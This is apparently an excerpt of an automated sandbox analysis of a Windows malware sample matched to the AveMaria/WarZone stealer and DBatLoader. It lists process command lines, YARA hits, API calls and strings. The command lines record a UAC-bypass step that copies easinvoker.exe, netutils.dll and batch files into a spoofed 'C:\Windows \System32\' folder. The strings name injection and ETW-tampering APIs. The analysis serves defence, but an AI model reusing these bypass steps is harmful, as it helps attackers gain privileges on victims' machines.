Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Users\Public\Libraries\dbkyovyK.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\dbkyovyK.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000001.1696850208.0000000000554000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: AveMaria_WarZone, Description: unknown, Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 3%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x7ff70f330000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:48:03
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: xcopy.exePID: 7200, Parent PID: 3664

General

Target ID:	18
Start time:	08:48:04
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x2a0000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:48:04
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: xcopy.exePID: 7236, Parent PID: 3664

General

Target ID:	20
Start time:	08:48:04
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x2a0000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:48:04
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: xcopy.exePID: 7268, Parent PID: 3664

General

Target ID:	22
Start time:	08:48:04
Start date:	06/02/2024
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "x.bat" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x2a0000
File size:	43'520 bytes
MD5 hash:	7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:48:12
Start date:	06/02/2024
Path:	C:\Users\Public\Libraries\Kyvoykbd.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Kyvoykbd.PIF"
Imagebase:	0x400000
File size:	1'951'744 bytes
MD5 hash:	9D00A95BE6B82AB307043A988595487B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Kyvoykbd.PIF, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:48:17
Start date:	06/02/2024
Path:	C:\Users\Public\Libraries\dbkyovyK.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\dbkyovyK.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: AveMaria_WarZone, Description: unknown, Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000019.00000001.1834966037.0000000000554000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:48:20
Start date:	06/02/2024
Path:	C:\Users\Public\Libraries\Kyvoykbd.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Kyvoykbd.PIF"
Imagebase:	0x400000
File size:	1'951'744 bytes
MD5 hash:	9D00A95BE6B82AB307043A988595487B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001A.00000002.1906996897.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:48:24
Start date:	06/02/2024
Path:	C:\Users\Public\Libraries\dbkyovyK.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\dbkyovyK.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000002.1918637421.0000000000554000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: AveMaria_WarZone, Description: unknown, Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000001D.00000001.1902763804.0000000000554000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: AveMaria_WarZone, Description: unknown, Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_EXEPWSH_DLAgent, Description: Detects SystemBC, Source: 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.7%
Total number of Nodes:	526
Total number of Limit Nodes:	39

Executed Functions

Function 02D6CA60 Relevance: 221.7, APIs: 12, Strings: 110, Instructions: 8183COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02D77AC9,?,?,?,000002BA,00000000,00000000), ref: 02D6CA95

Part of subcall function 02D2FD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD78
Part of subcall function 02D2FD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FD86
Part of subcall function 02D2FD40: GetProcAddress.KERNEL32(74B00000,00000000), ref: 02D2FD9F
Part of subcall function 02D2FD40: VirtualProtect.KERNEL32(02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDBA
Part of subcall function 02D2FD40: GetCurrentProcess.KERNEL32(00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDD7
Part of subcall function 02D2FD40: FlushInstructionCache.KERNEL32(00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDDD
Part of subcall function 02D2FD40: FreeLibrary.KERNEL32(74B00000,00000000,00000000,00000000,02DAD35C,6FC0FFFF,00000040,02DAD360,74B00000,00000000,00000000,00000000,00000000,00000000,00000000,02D2FE08), ref: 02D2FDE8

Part of subcall function 02D18DF0: GetFileAttributesA.KERNEL32(00000000,?,02D6D4E6,ScanString,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,ScanString,02DAD350,02D77B00,UacScan,02DAD350,02D77B00,UacInitialize), ref: 02D18DFB

Part of subcall function 02D1D580: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EA1B38,?,02D6D807,ScanBuffer,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,ScanBuffer,02DAD350,02D77B00,OpenSession), ref: 02D1D597

Part of subcall function 02D6B714: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D6B7E4), ref: 02D6B74F
Part of subcall function 02D6B714: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D6B7E4), ref: 02D6B77F
Part of subcall function 02D6B714: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D6B794
Part of subcall function 02D6B714: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D6B7C0
Part of subcall function 02D6B714: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D6B7C9

Part of subcall function 02D18E14: GetFileAttributesA.KERNEL32(00000000,?,02D7064B,ScanString,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,ScanBuffer,02DAD350,02D77B00,ScanString), ref: 02D18E1F

Part of subcall function 02D18FDC: CreateDirectoryA.KERNEL32(00000000,00000000,?,02D706F1,ScanBuffer,02DAD350,02D77B00,ScanString,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00), ref: 02D18FE9

Part of subcall function 02D6B630: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D6B702), ref: 02D6B66F
Part of subcall function 02D6B630: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D6B6A9
Part of subcall function 02D6B630: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D6B6D6
Part of subcall function 02D6B630: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D6B6DF

Strings

Advapi, xrefs: 02D769E5, 02D769F4, 02D76A03, 02D76A12, 02D76A4E, 02D76A5D, 02D76A6C
Initialize, xrefs: 02D6CB2E, 02D6D8D2, 02D6DA55, 02D6DC0A, 02D6DDB0, 02D6E065, 02D6EB66, 02D6F01E, 02D6F2D8, 02D6F3E2, 02D6FAC9, 02D6FD03, 02D6FF2B, 02D7025F, 02D706FD, 02D70D6F, 02D70F34, 02D74DEB, 02D75610, 02D75A02, 02D764FD, 02D76D79, 02D77497
C:\\Users\\Public\\Libraries\\, xrefs: 02D70E5B
advapi32, xrefs: 02D759B4
GET, xrefs: 02D6F7FB
UacUninitialize, xrefs: 02D721DA
NtReadVirtualMemory, xrefs: 02D770E5
bcrypt, xrefs: 02D6CFA9, 02D6CFDC, 02D6D00F, 02D75880, 02D75894, 02D758A8, 02D7645F
NtQuerySecurityObject, xrefs: 02D77118
C:\Users\Public\, xrefs: 02D709F8, 02D7178A
ntdll, xrefs: 02D759C8, 02D759DC, 02D767CA, 02D767FD, 02D76830, 02D76863, 02D76896, 02D76FCA, 02D76FFD, 02D77030, 02D77063, 02D77096, 02D770C9, 02D770FC, 02D7712F, 02D77162, 02D77195, 02D771C8, 02D771FB, 02D7722E, 02D77261, 02D77294, 02D77609
RtlQueryProcessDebugInformation, xrefs: 02D769D1
DllGetActivationFactory, xrefs: 02D6D156
BCryptRegisterProvider, xrefs: 02D6CFF8, 02D758A3
endpointdlp, xrefs: 02D76606, 02D76639, 02D7666C, 02D7669F
CryptSIPGetSignedDataMsg, xrefs: 02D6CEE3
SxTracerGetThreadContextDebug, xrefs: 02D76EE7
I_QueryTagInformation, xrefs: 02D759AF
LdrLoadDll, xrefs: 02D7717E
NtQuerySystemInformation, xrefs: 02D769A4
OpenProcess, xrefs: 02D76CA7
RtlCreateQueryDebugBuffer, xrefs: 02D7687F
RtlAllocateHeap, xrefs: 02D767E6, 02D7684C
CryptSIPGetInfo, xrefs: 02D6CE7D
DllGetClassObject, xrefs: 02D6D123, 02D70773, 02D76F1A
CreateProcessAsUserA, xrefs: 02D76A49
connect, xrefs: 02D76A76
ScanBuffer, xrefs: 02D6CB92, 02D6CE07, 02D6D031, 02D6D576, 02D6D683, 02D6D78A, 02D6DB4D, 02D6DD02, 02D6DEA8, 02D6DF4C, 02D6E15D, 02D6E1D9, 02D6E8A0, 02D6EAEA, 02D6ECF8, 02D6EE02, 02D6EF26, 02D6F354, 02D6F4F1, 02D6F89C, 02D6FBEB, 02D6FEAF, 02D70023, 02D701E3, 02D70391, 02D7065F, 02D707CC, 02D708F7, 02D70DEB, 02D710A8, 02D7116A, 02D712DE, 02D7135A, 02D71C01, 02D71EBF, 02D7215E, 02D74028, 02D742B7, 02D74708, 02D7481F, 02D749BC, 02D74A57, 02D74B4F, 02D751C5, 02D75501, 02D7568C, 02D7593F, 02D75C98, 02D75F71, 02D7608E, 02D76150, 02D76579, 02D77513
C:\Windows\System32\, xrefs: 02D6D4D1, 02D745C2, 02D750FE
EnumServicesStatusExW, xrefs: 02D76A0D
BCryptQueryProviderRegistration, xrefs: 02D6CFC5, 02D7588F
NtQueryDirectoryFile, xrefs: 02D769C2
^^Nc, xrefs: 02D6DF1E, 02D6EABC
[InternetShortcut], xrefs: 02D714E1
VirtualAlloc, xrefs: 02D76C0E
IconIndex=, xrefs: 02D71544
CreateProcessW, xrefs: 02D76A3A
EtwEventWrite, xrefs: 02D7727D
URL=file:", xrefs: 02D714F0
NtWaitForSingleObject, xrefs: 02D76819
VirtualAllocEx, xrefs: 02D76C41
sppwmi, xrefs: 02D76F31
DlpGetArchiveFileTraceInfo, xrefs: 02D76655
NtQueryInformationThread, xrefs: 02D77019
EnumProcessModules, xrefs: 02D76A1C
FlushInstructionCache, xrefs: 02D76D0D
NtQueryVirtualMemory, xrefs: 02D76FE6
ws2_32, xrefs: 02D76A7B
@^@, xrefs: 02D6F110
C:\Users\Public\Libraries, xrefs: 02D6DA3F
NtAlertResumeThread, xrefs: 02D767B3
Ntdll, xrefs: 02D769A9, 02D769B8, 02D769C7, 02D769D6
NtCreateSection, xrefs: 02D7707F
TrustOpenStores, xrefs: 02D6CD19
DlpGetWebSiteAccess, xrefs: 02D76688
DlpNotifyPreDragDrop, xrefs: 02D765EF
wintrust, xrefs: 02D6CD2A, 02D6CD51, 02D6CD78
MZP, xrefs: 02D75FE7
can, xrefs: 02D72458
CreateProcessWithLogonW, xrefs: 02D76A67
SetUnhandledExceptionFilter, xrefs: 02D76D40
LdrGetProcedureAddress, xrefs: 02D771B1
spp, xrefs: 02D76EFE
kernel32, xrefs: 02D76C25, 02D76C58, 02D76C8B, 02D76CBE, 02D76CF1, 02D76D24, 02D76D57
NtDeviceIoControlFile, xrefs: 02D769B3
EtwEventWriteEx, xrefs: 02D7724A
smartscreenps, xrefs: 02D6D13A, 02D6D16D, 02D6D1A0
NtOpenSection, xrefs: 02D7704C
EnumServicesStatusA, xrefs: 02D769E0
SLGetEncryptedPIDEx, xrefs: 02D76F80
TMo, xrefs: 02D70351
http, xrefs: 02D6F4CE
NtAccessCheck, xrefs: 02D7714B
C:\\Windows \\System32\\easinvoker.exe, xrefs: 02D74212
CreateProcessAsUserW, xrefs: 02D76A58, 02D76A85
sppc, xrefs: 02D76F64, 02D76F97
NtGetWriteWatch, xrefs: 02D76FB3
WintrustAddActionID, xrefs: 02D6CD40
cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 02D74329
NtOpenProcess, xrefs: 02D759D7, 02D77604
mssip32, xrefs: 02D6CE94, 02D6CEC7, 02D6CEFA
DlpCheckIsCloudSyncApp, xrefs: 02D76622
iexpress.exe, xrefs: 02D6D6F8
FindCertsByIssuer, xrefs: 02D6CD67
HotKey=, xrefs: 02D71678
SLGatherMigrationBlob, xrefs: 02D76F4D
acS, xrefs: 02D72445
NtSetSecurityObject, xrefs: 02D759C3
NtMapViewOfSection, xrefs: 02D770B2
DEEX, xrefs: 02D6CAA3
BCryptVerifySignature, xrefs: 02D6CF92, 02D7587B, 02D76448
ScanString, xrefs: 02D6CCBE, 02D6CD97, 02D6CF1C, 02D6D0AD, 02D6D336, 02D6D455, 02D6D9CA, 02D6EA46, 02D6EBE2, 02D6F09A, 02D6F141, 02D6F239, 02D6F45E, 02D6F784, 02D6F9A8, 02D6FA4D, 02D6FD92, 02D700CB, 02D702DB, 02D705B9, 02D70B47, 02D70CF3, 02D70FB0, 02D71471, 02D715E6, 02D7169E, 02D71D1F, 02D71F6C, 02D7419C, 02D743BB, 02D7444C, 02D74EE3, 02D752EF, 02D75400, 02D7580B, 02D75D6F, 02D76248, 02D76356, 02D7673D, 02D76934, 02D76B98, 02D76E71, 02D7739F
UacInitialize, xrefs: 02D6CBF6, 02D6D23E, 02D6D94E, 02D70A4F, 02D740A4, 02D74FF0, 02D75C1C, 02D76AA0
NtWriteVirtualMemory, xrefs: 02D771E4
OpenSession, xrefs: 02D6CACA, 02D6D3D9, 02D6D4FA, 02D6D607, 02D6D70E, 02D6DAD1, 02D6DC86, 02D6DE2C, 02D6DFC8, 02D6E0E1, 02D6E255, 02D6E91C, 02D6E9CA, 02D6EC7C, 02D6EEAA, 02D6EFA2, 02D6F1BD, 02D6F56D, 02D6F5F0, 02D6F708, 02D6F820, 02D6F92C, 02D6FB6F, 02D6FE0E, 02D6FFA7, 02D70147, 02D7040D, 02D7053D, 02D70848, 02D70973, 02D70ACB, 02D70BFB, 02D70C77, 02D7102C, 02D71262, 02D713D6, 02D7156A, 02D7171A, 02D71B85, 02D71D9B, 02D71E43, 02D71FE8, 02D722F5, 02D74120, 02D7423B, 02D7433F, 02D744C8, 02D74665, 02D7489B, 02D74940, 02D74BCB, 02D74D6F, 02D7506C, 02D75273, 02D75384, 02D75485, 02D7578F, 02D758C3, 02D75AFA, 02D75DEB, 02D75E79, 02D761CC, 02D763D2, 02D76481, 02D766C1, 02D768B8, 02D76B1C, 02D76DF5, 02D7741B, 02D7758F
